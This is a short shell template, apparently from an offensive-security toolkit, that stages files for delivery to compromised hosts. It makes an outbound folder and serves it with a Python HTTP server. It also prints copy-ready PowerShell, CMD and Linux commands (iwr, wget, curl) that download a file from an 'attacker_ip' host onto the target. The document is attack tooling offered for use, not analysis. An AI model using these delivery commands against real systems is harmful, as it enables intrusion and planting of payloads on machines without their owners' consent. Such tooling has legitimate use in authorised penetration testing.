mkdir -p packstation/outbound; \
echo '================================================================'; \
echo '                      -----PowerShell-----                      '; \
echo 'Deliver: iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/FILE -Outfile <%=$(esh variables/delivery_path_windows)%>\FILE'; \
echo '================================================================'; \
echo '                         -----CMD-----                          '; \
echo 'Deliver: powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/FILE -Outfile <%=$(esh variables/delivery_path_windows)%>\FILE'; \
echo '================================================================'; \
echo '                       -----Linux------                         '; \
echo 'Deliver: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/FILE -o <%=$(esh variables/delivery_path_linux)%>/FILE'; \
echo '================================================================'; \
python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
